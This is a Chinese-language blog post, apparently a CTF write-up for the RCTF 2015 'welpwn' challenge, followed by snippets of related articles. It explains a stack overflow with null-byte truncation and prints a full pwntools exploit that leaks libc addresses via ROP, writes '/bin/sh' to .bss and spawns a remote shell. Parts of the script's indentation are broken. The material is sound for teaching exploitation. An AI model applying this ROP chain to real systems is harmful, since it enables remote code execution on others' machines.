rois welpwn -xman

最新推荐文章于 2022-12-05 19:36:31 发布
最新推荐文章于 2022-12-05 19:36:31 发布
阅读量843 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014281987/article/details/52343581
版权

echo 函数有栈溢出,把之前read的字符串复制到栈里,可素64位rop指令有00,所以根据echo函数逻辑,一个pop之类的后面的ret就覆盖不了,rop到此为止。不过看看main,木有截断哦,所以ppppr = 0x40089c这个就是为了把之前main栈里的24个a和一个pppr弹出来,接着不就可以之后写个ret,继续构造rop了吗!所以利用上一个栈桢是很有用滴,比如robot那个构造递归调用读取上面栈桢同flag的值

神器是DynELF,据说只需要写个leak,把某地址的内容读出来就行。通过此方法可以不需要libc!!! leak每次把流程返回到main,就可以重新rop出地址的内容,据说栈用太多会出问题,所以没事就要pop下栈,然而并不知道何时pop,所以改天还是得问问

另,rop的精髓就在于ret地址保存在栈上,所以一个ret可以接着一个ret

这里面一个坑点在于printf自己木有\n木有缓冲,于是回到main函数遇到fflush(如果fd=null,把输出全flush)才回把之前的24个a和pppr打出来,因此接收地址时要注意。


输出函数缓冲小知识链接

http://www.pixelbeat.org/programming/stdio_buffering/



from pwn import *
#sock1 = process('./welpwn')
sock1=remote('218.2.197.235',21032)
elf=ELF('welpwn')
got_write=elf.got['write']
got_read=elf.got['read']
pppppr=0x400896
mv=0x400880
bss_start = 0x601060
poprdi = 0x004008a3
ppppr = 0x40089c
puts_plt = 0x4005A0
main = 0x4007CD
flag=True
def leak(addr):
    global flag
    print sock1.recvuntil("RCTF\n")
    rop=p64(pppppr)+p64(0)+p64(0)+p64(1)+p64(got_write)+p64(8)+p64(addr)+p64(1)+p64(mv)+'A'*56+p64(main)
    sock1.sendline('A'*24 + p64(ppppr) + rop)
    
    
    print "send:"
    if flag:
      d=sock1.recv(8)
      
  flag=False
    else:
  print sock1.recv(0x1b)
  d=sock1.recv(8)
    return d
    


 
    


d=leak(got_write)
print "write:"+hex(u64(d))
#d = DynELF(leak, elf=ELF('./welpwn'))
#system = d.lookup('system', 'libc')
offset=-0xa6100
system=u64(d)+offset
print 'system address:'+hex(system)
#gets = d.lookup('gets', 'libc')


rop1 = p64(pppppr)+p64(0)+p64(0)+p64(1)+p64(got_read)+p64(16)+p64(bss_start)+p64(0)+p64(mv)+'A'*56+p64(main)


sock1.recvuntil('F\n')
sock1.sendline('A'*24 + p64(ppppr) + rop1)


sock1.send('/bin/sh\0')
sock1.send(p64(system))






rop2 = p64(pppppr)+p64(0)+p64(0)+p64(1)+p64(bss_start+8)+p64(0)+p64(0)+p64(bss_start)+p64(mv)+'A'*56+p64(main)
sock1.recvuntil('F\n')
sock1.sendline('A'*24 + p64(ppppr) + rop2)






sock1.interactive()

lulu_ctf
关注
(攻防世界)(pwn)welpwn
PLpa的博客
07-18 2739
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
welpwn(xctf)
weixin_43868725的博客
06-15 261
0x0 程序保护和流程 保护: 流程: main() echo() echo函数中存在明显的栈溢出漏洞。 0x1 利用过程 使用x64的通用gadget,泄露write函数的地址。使用LibcSearcher查出相应的libc,得到system函数和/bin/sh字符串的地址就可以getshell了。但是理想是丰满的现实是骨感的,exp写完后一直报错。用GDB查看一下core。发现确实覆盖了返回地址但是后面紧接着是输入缓冲区中的数据。回过去看echo函数,发现在写入s2的时候/x00会被截断,这种截断
RCTF Welpwn
weixin_30871293的博客
01-12 153
Welpwn 很久以前的了,现在整理一下 题目的漏洞很明显,就是一个栈溢出。程序打开了NX,却没有给libc。重点是,在向栈上拷贝数据时,如果输入中含有'\x00',会被截断,对利用漏洞造成了困难。虽说被'\x00'截断但是还是能将返回地址覆盖。 以前曾见到一篇名为return to dl_resolve的文章,副标题是ret2lib without information leak,感觉很...
RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]
ACdream
01-26 388
https://blog.csdn.net/u011987514/article/details/70232881 按照自己习惯,代码重写一下: #!/usr/bin/env python # coding=utf-8 from pwn import * io = process("./welpwn") #gadgets p4r = 0x40089C pr = 0x4008A3 mai...
pwn-welpwn
醉等佳人归
09-08 281
1.题目 1.保护机制 开启nx 2.关键代码 主函数 echo函数 2.思路 重点1:可以看到栈溢出漏洞,但是echo函数代码显然限制了ROP链中有\x00的出现,但是我们发现echo函数栈非常小,导出我们溢出可以溢出到主函数的buf缓冲区中,而且主函数的buf是不受\x00影响的,所以我们先使用pop覆盖echo函数的返回值,然后在主函数的buf中执行shellcode 重点2:这次试用了LibcSearcher库来完成函数地址泄漏 from pwn import * from ctypes imp
mmROI (Multiple Images with Multiple ROIs):打开多张图片,预制多个ROIs流程-matlab开发
06-01
1) 目标:交互式处理具有多个 ROI(所谓的 mmROI)的多个图像,返回 ROI 均值、标准、最小值、最大值、中值、面积和中心(X,Y),并沿图像绘制均值/标准值系列。 2)用法:[roi, im] = mmROI;...
matlab图片叠加的代码-Drawing-ROIs-without-GUI:使用非图形用户界面绘制投资回报率
05-23
matlab图片叠加的代码在没有GUI的情况下绘制ROI 在Matlab中使用非图形用户界面绘制ROI 分析钙成像数据时,绘制ROI是一项重复性的任务。 尽管进行了自动化尝试(例如),但大多数时候手动绘制ROI仍是最佳解决方案。...
matlab匹配滤波代码-ROIs_registration_with_SIFT:使用SIFT在整个会话中注册ROI
05-24
matlab匹配滤波代码ROIs_registration_with_SIFT 在给定动物和给定视野的多个会话中注册ROI。 使用比例不变特征变换(SIFT; David Lowe 1999)对齐视场。 ROI匹配基于CaImAn中实现的方法(Giovannucci等人eLife ...
软路由rois
07-27
安装于破解方法:2个ISO分别刻盘(虚拟机无视该步骤), 先安装官方原版mikrotik-5.24.iso, 再用破解光盘启动HunterTik-v2.3.1.iso, 一路回车,搞定。。。... (如果以前是安装过HunterTik-v2.3.1.iso破解的(5.22-...
英雄巡回赛:TourHeroes,最热门的um lista deheróisda marvel com Quantidadejápré-listada,pod registrar maishérois
02-18
旅游英雄 该项目是使用版本9.1.9生成的。 开发服务器 为开发服务器运行ng serve 。... 如果您更改任何源文件,该应用程序将自动重新加载。 代码脚手架 运行ng generate component component-name生成一个新的组件。...
welpwn pwn 入门题
02-11
pwn 入门题
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍 修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。 产品特点 自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位和64位 调试增强(支持PIE )。 符号 断点 杂项 libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。 安装 您有两种使用welpwn 。 通过安装 从0.9.3版本开始已添加setup.py 。
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 663
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
攻防世界 Pwn welpwn
MrTreebook的博客
12-25 2535
攻防世界 Pwn welpwn1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary 没有PIE 3.IDA分析 main函数中有一个可以输入的地方,但是不能溢出 接着往下看 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到一个特殊的gadget,它就是破题的关键 我们
[攻防世界]-welpwn
m0_55906008的博客
12-05 620
pwn
RCTF-2015——welpwn
05-11 337
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
ADworld pwn wp - welpwn
fa1c4的blog
06-26 176
输入没有溢出, 但是复制过程出现了溢出点, 0x400复制到0x10中, 所以可以溢出echo函数, 劫持到ROP泄露puts地址, 找到libc版本, 然后ret2libc. 不过尝试之后发现行不通, 因为复制过程遇到截断符’\0’会停止, 所以直接ROP链会复制不完全, pop_rdi_addr本身就包含了’\0’, 所以可以平衡栈后执行ROP, 这里不一定是在复制完返回地址之后马上截断, 但是8字节地址中包含’\0’, 所以一定会截断, 这里覆盖到的地址是buf的前8个字节, 对ROP没影响,...
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 961
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
菜鸟做题记--------welpwn(RCTF2015)
Return的博客
02-12 622
1.看下保护发现只打开了NX。 [*] 'home/ctf/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 2.拖入IDA看下结果 int __cdecl main(int argc, const char **argv, const char **e
subset data from rois
最新发布
09-18
Subset data from rois是指从感兴趣区域(ROIs)中获取子集数据。ROIs是指在数据集中定义的特定区域,可能是在图像、地图、生物学等领域中使用的感兴趣区域。 获取ROIs的子集数据通常涉及以下步骤: 首先,我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值